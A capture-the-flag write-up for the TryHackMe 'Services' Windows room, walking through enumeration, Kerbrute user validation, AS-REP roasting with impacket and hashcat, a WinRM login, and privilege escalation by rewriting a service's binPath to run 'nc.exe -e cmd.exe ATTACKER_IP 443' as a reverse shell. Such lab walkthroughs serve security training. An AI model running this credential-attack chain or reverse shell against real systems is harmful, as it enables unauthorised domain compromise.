THM - Services

THM Easy 4/1/2026
#AD #Services #Widnows #ASREPRoasting

🧠 Overview

Target machine exposing Active Directory services. Initial foothold achieved via AS-REP roasting, followed by privilege escalation through misconfigured service permissions.

https://tryhackme.com/room/services

  • AS-REP roasting possible due to users without pre-authentication
  • Weak password reused → easy crack
  • Server Operators group is highly dangerous
  • Service misconfiguration leads to full system compromise

🌐 Enumeration

nmap -p- -Pn -sS -sV -sC -T4 --min-rate 1000 --max-retries 2 -v $target

Key Findings

  • Port 88 (Kerberos) → Likely Domain Controller
  • Domain identified: services.local
  • Port 80 (HTTP) available

Web Enumeration

  • Found email in Footer:
    • j.doe@services.local
  • Discovered Users in About Page
    • http://$target/about.html
      • Joanne Doe
      • Jack Rock
      • Will Masters
      • Johnny LaRusso

User Enumeration

Generated possible usernames:

python3 uname-gen.py -u names.txt -o potential_users.txt

Validated users with Kerbrute:

kerbrute potential_users.txt --dc $target -d services.local

Valid Users:

j.doe@services.local
w.masters@services.local
j.rock@services.local 
j.larusso@services.local

🔐 Initial Access (AS-REP Roasting)

Performed AS-REP roasting:

impacket-GetNPUsers services.local/ -dc-ip $target -usersfile users.txt -outputfile hashes.txt

Obtained hash for:

  • j.rock

Password Cracking

hashcat -m 18200 ../hashes.txt /usr/share/wordlists/rockyou.txt

Obtained Credentials

  • j.rock : Service*****

🐚 Shell Access

nxc winrm $target -u j.rock -p Service******
evil-winrm -u j.rock -p Service****** $target

🔐 Privilege Escalation

whoami /all

Interesting Finding

  • Member of:
    • BUILTIN\Server Operators

➡️ This group can modify services → PrivEsc opportunity

Exploit Steps

  1. Enumerate services and Identify any target service
  2. Upload nc.exe to target machine
  3. Modify Service Binary Path
sc.exe config VMTools binPath="C:\Users\nc.exe -e cmd.exe ATTACKER_IP 443"
  1. Start Listener
nc -lvp 443
  1. Restart Service
sc.exe stop VMTools
sc.exe start VMTools
  1. Reverse shell received as Administrator

📁 Flags

type C:\Users\j.rock\Desktop\user.txt
type C:\Users\Administrator\Desktop\root.txt